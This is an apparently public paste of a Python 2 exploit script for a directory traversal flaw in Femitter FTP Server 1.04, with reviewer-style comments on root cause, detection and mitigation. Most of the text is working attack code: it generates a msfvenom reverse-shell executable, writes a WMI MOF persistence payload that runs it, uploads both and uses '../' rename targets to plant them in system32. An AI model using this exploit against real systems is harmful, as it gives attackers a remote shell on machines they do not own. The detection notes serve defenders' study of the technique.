
Acritum Femitter Server ftpd exploit

a guest Jul 23rd, 2019 219 Never
#!/usr/bin/python

# Proof-of-concept for a directory traversal vulnerability in Femitter FTP Server <= 1.04.
# Tested on XP Professional x86.
# A listener has to be set up separately to catch the reverse shell.
# The ftp.cwd() call below may need to be edited by hand if Femitter is not in its default configuration.
# Inspired by Ippsec's DropZone walkthrough & HackTheBox.eu
# Written for Python 2: it calls raw_input().

# What the script does:
#1. creates an MSF payload;
#2. creates a MOF payload;
#3. uploads both payloads to writable dir;
#4. renames them to place them in system32 and system32/wbem/mof/ respectively;

# Root cause as exercised below: the server accepts an FTP rename whose target
# contains "../" sequences and resolves it outside the FTP root. Valid FTP
# credentials and a writable directory are needed before that step.
# Exposure: the renamed files land under windows/system32, so the step only works
# when the FTP service account can write there -- presumably a privileged
# account; confirm on the host.
# Detection: rename targets containing "../" in the FTP server log; new files in
# system32 and system32/wbem/mof written by the FTP server process; WMI
# registrations of ActiveScriptEventConsumer / __FilterToConsumerBinding.
# Mitigation: this page names no fixed version. Run the FTP service under a
# low-privileged account, confine it to its root, and limit who may upload.

import os
import sys
from ftplib import FTP

# Exactly two arguments are required; anything else prints the usage text and exits.
if len(sys.argv) != 3:
    print("Usage: femitter.py lhost lport\nExample: femitter.py 10.10.10.10 443")
    exit()
else:
    lhost = sys.argv[1]
    lport = sys.argv[2]

# The shell command is built by plain concatenation of the two arguments, unquoted.
# Output and errors go to /dev/null, so a failed msfvenom run is silent here.
command = "msfvenom -p windows/shell_reverse_tcp lhost=" + lhost + " lport=" + lport + " -f exe --platform windows -a x86 -o zzzzz.exe >/dev/null 2>&1"


print('[+] creating msfvenom payload...' + '\r')
# The return status of os.system() is not checked.
os.system(command)

#creating our hardcoded MOF payload, thanks to ippsec
# The MOF text below declares a throwaway class (MyClass54266), registers an
# ActiveScriptEventConsumer named "ASEC" whose JScript runs zzzzz.exe, and binds
# it to an event filter named "instfilt" that fires on creation of a MyClass54266
# instance. The last statement creates such an instance, which matches the filter.
# The JScript also deletes the class, the filter and the consumer afterwards, so
# those WMI objects may no longer exist when a host is examined later; file
# creation and process-lineage telemetry are the more durable evidence.
print('[+] creating MOF payload...' + '\r')
mof_file = open("exploit.MOF", "w")
mof_file.write("""#pragma namespace("\\\\\\\\.\\\\root\\\\cimv2")
class MyClass54266
{
    [key] string Name;
};
class ActiveScriptEventConsumer : __EventConsumer
{
    [key] string Name;
    [not_null] string ScriptingEngine;
    string ScriptFileName;
    [template] string ScriptText;
  uint32 KillTimeout;
};
instance of __Win32Provider as $P
{
    Name  = "ActiveScriptEventConsumer";
    CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
    PerUserInitialization = TRUE;
};
 
instance of __EventConsumerProviderRegistration
{
  Provider = $P;
  ConsumerClassNames = {"ActiveScriptEventConsumer"};
};
 
Instance of ActiveScriptEventConsumer as $cons
{
  Name = "ASEC";
  ScriptingEngine = "JScript";
  ScriptText = "\\ntry {var s = new ActiveXObject(\\"Wscript.Shell\\");\\ns.Run(\\"zzzzz.exe\\");} catch (err) {};\\nsv = GetObject(\\"winmgmts:root\\\\\\\\cimv2\\");try {sv.Delete(\\"MyClass54266\\");} catch (err) {};try {sv.Delete(\\"__EventFilter.Name='instfilt'\\");} catch (err) {};try {sv.Delete(\\"ActiveScriptEventConsumer.Name='ASEC'\\");} catch(err) {};";
 
};
 
instance of __EventFilter as $Filt
{
  Name = "instfilt";
  Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \\"MyClass54266\\"";
  QueryLanguage = "WQL";
};
 
instance of __FilterToConsumerBinding as $bind
{
  Consumer = $cons;
  Filter = $Filt;
};
 
instance of MyClass54266 as $MyClass
{
  Name = "ClassConsumer";
};
 
""")
mof_file.close()

# Target address and FTP credentials are read interactively (Python 2 raw_input).
victimIP = str(raw_input("[!] enter the victim IP: "))
username = str(raw_input("[!] enter Femitter FTP username: "))
password = str(raw_input("[!] enter Femitter FTP password: "))

#login to ftp server, change directories, upload our msfvenom payload, upload our .MOF payload, catch reverse-shell
# Each stage sits in its own try with a bare except that only prints a message.
# A failed stage does not stop the script: the later stages still run and report
# their own failure.
print('[+] authenticating to Femitter server...')
try:
    ftp = FTP(victimIP)
    ftp.login(username,password)
except:
    print('[-] unable to connect to server')
try:
    print('[+] uploading payloads...')
    ftp.cwd('Upload')
    #^Change this if femitter is not in default config!!^
    # The two files opened here are never closed explicitly.
    ftp.storbinary('STOR zzzzz.exe', open('zzzzz.exe', 'rb'))
    ftp.storbinary('STOR exploit.MOF', open('exploit.MOF', 'rb'))
except:
    print('[-] unable to upload payloads, non-default configuration?')
try:
    print('[+] executing payloads...')
    # ftplib's rename() issues RNFR followed by RNTO. Both targets climb six
    # directory levels and then name a path under windows/system32; a server
    # that confined rename targets to the FTP root would reject them.
    # Nothing is executed by the script itself. On the XP-era system named in
    # the header, WMI is known to compile MOF files that appear in wbem/mof --
    # NOTE(review): that behaviour is not visible in this file; confirm per OS.
    ftp.rename('zzzzz.exe', '../../../../../../windows/system32/zzzzz.exe')
    ftp.rename('exploit.MOF', '../../../../../../windows/system32/wbem/mof/exploit.MOF')
    ftp.quit()
    # Printed as soon as the renames and quit return; no result is verified.
    print('[+] enjoy that shell ;)')
except:
    print('[-] unable to execute payloads')